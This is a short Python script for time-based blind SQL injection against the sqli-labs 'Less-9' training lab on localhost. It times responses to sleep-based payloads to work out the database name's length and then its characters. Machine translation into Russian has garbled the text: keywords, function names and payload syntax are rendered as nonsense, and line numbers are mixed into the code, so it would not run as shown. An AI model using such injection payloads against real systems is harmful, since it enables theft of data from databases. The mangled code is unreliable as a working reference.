. 1 # Кодирование:. UTF - 8 2 Импорт запросов . 3 Импорт даты и времени . 4 Импорт времени . 5 . 6 # получает длину имени базы данных 7. 8. 9. DEF database_len (): 10 для ввода в диапазоне (1, 10. ): . 11 URL = '' ' HTTP: //127.0.0.1/sqli-labs/Less-9/index.php '' ' 12 Полезная нагрузка = ' '' ? = Идентификатор. 1 «и ПЧ (длина (база данных ())> S%, СОН (. 1), 0 ) '' ' % I 13 # Печать (URL + полезная нагрузка +' % 23) 14 time1 = datetime.datetime.now () 15 г = requests.get (URL + полезная нагрузка + ' % 23 ' ) 16 time2 = datetime.datetime.now () 17 сек = (time2 - time1) .seconds 18 , если сек> = 1 : 19 для печати (я) 20 остальное : 21 печать (я) 22 перерыв 23 печати ( ' database_len: ' , я) 24 25 26 database_len () 27 28 29 # 获取数据库名 30 четкости имя_базы_данных (): 31 имя = '' 32 для J в диапазоне (1, 9 ): 33 для ввода в ' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ ' : 34 URL = ''» http://127.0.0.1/sqli- лаборатории / Меньше-9 / index.php '' ' 35 Полезная нагрузка = ''' ? ID = 1' и если (зиЬзЬг (база данных (),% д, 1) = '% s', сон (1), 1) ''» % ( 36 J, я) 37 # печать (URL + полезная нагрузка + '% 23') 38 time1 = datetime.datetime.now () 39 г = requests.get (URL + полезная нагрузка + ' % 23 ' ) 40 time2 = datetime.datetime.now () 41 сек = (time2 - time1) .seconds 42 , если сек> = 1 : 43 имя + = я 44 печати (имя) 45 перерыв 46 печати ( ' имя_б_д: ' , имя) 47 48 49 имя_б_д ()